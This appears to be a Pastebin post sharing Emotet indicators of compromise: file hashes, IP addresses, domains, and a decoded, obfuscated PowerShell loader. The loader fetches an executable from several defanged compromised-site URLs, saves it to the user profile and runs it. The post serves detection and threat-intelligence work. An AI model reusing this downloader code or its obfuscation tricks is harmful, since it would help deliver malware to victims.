Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- #Emotet #Docs #malware #OSINT #IOC
- MD5:
- 381e7ef1e1748eb56b9a7316ec0eebca
- e8b0fb3e1c17c8fa42cd9b7726abd5f4
- 89e2ea926b61d8cb6fef8cb69109a2b1
- a6d85363c78095bbe3d798520ce40d05
- IPs:
- 119.28.5.109
- 134.0.10.197
- 149.56.222.236
- 192.155.90.244
- 202.181.97.25
- 31.47.73.71
- 45.119.83.237
- 45.56.101.4
- 62.129.201.213
- 69.42.58.144
- Domains:
- blog.yst.global
- dncvietnam.com
- drapart.org
- kikinet.jp
- pbcenter.home.pl
- proxectomascaras.com
- tendenciasv.com
- www.correlation.ca
- www.divinedollzco.com
- www.moneyhairparty.com
- URLs:
- Decoded Base64 Powershell:
- <# hxxps://www.microsoft.com/ #> $N_o_AZDU='McB_C4AkX'
- $ZD1AAAAA4ZAAo = '723'
- $ZXBAXAwG='VQAxXo1Z4GB4'
- $KABGAZoAZAA=$env:userprofile+'\'+$ZD1AAAAA4ZAAo+'.exe'
- $UcGABAUCU='RAAABAABQA'
- $JAADxABADUQcD=.('new'+'-o'+'bject') NeT.WEbclienT
- $OAAABckZA='hxxp://drapart.org/Prensa/wn//
- hxxp://kikinet.jp/ds/b54LWnii45//
- hxxp://pbcenter.home.pl/pbc/ib3k//
- hxxps://proxectomascaras.com/wp-admin/FUCPOXyKQU//
- hxxp://blog.yst.global/wp-content/languages/2jlffy/'."spL`It"('/
- ')
- $XU_AUkG4UA1='DABCxoABB'
- foreach($QGAXU__o_A in $OAAABckZA){try{$JAADxABADUQcD."d`o`wNLOA`dfIlE"($QGAXU__o_A, $KABGAZoAZAA)
- $WAAQZxckxUQQD='WxQDw4ADABwAA'
- If ((.('Ge'+'t-Item') $KABGAZoAZAA)."LENg`TH" -ge 25679) {[Diagnostics.Process]::"STA`RT"($KABGAZoAZAA)
- $IAZCQDAD='EkADA_CxxA'
- break
- $HAQD4U1UAB='L4Bx_QoUUQ'}}catch{}}$HDAAGUAGw='EU___QcXAAU'
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement
